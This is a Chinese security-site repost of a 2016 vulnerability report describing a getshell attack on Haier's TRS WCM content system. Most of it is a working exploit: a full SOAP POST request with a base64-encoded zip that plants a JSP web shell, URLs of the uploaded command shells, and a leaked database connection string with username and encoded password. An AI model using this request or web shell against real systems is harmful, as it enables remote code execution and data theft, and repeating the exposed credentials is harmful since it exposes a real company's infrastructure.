频道栏目
首页 > 安全 > 网站安全 > 正文
Getshell到海尔主站以及旗下所有二级域名以及数据库(应用漏洞直接getshell)
2016-02-15 09:20:13         来源:小胖子  
收藏   我要投稿

没有描述!

WooYun: TRSWCM全版本GETSHELL漏洞

https://enwcm.haier.com/ 首先后台对外网开放

https://enwcm.haier.com/wcm/services/trswcm:SOAPService 漏洞存在这里

 

POST https://enwcm.haier.com/wcm/services/trswcm:SOAPService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml
Content-Length: 4049


     
     
     
         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
         .zip
        
     

添加一个请求头
 

haier1.png



base64部分是压缩包编码后的
 

haier2.png



https://enwcm.haier.com/webpic/help.jspx xiaomi

https://enwcm.haier.com/webpic/cmd.jspx?paxmac=id 这是我传的cmd

www.haier.com/cn/wooyun.shtml

以及shell截图
 

haier3.png



connectionURL="jdbc:jtds:sqlserver://127.0.0.1:3306/TRSWCMV65"

connectionUser="root" connectionPassword="EncrypteddHJzYWRtaW4."


以及数据库配置信息
 

解决方案:

你们更专业!

点击复制链接 与好友分享!回本站首页
上一篇:巨人网络之看我如何确认你补天漏洞(发现Shell)
下一篇:CmsEasy企业网站管理系统数据库直连(涉及大量用户密码\敏感信息泄漏)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站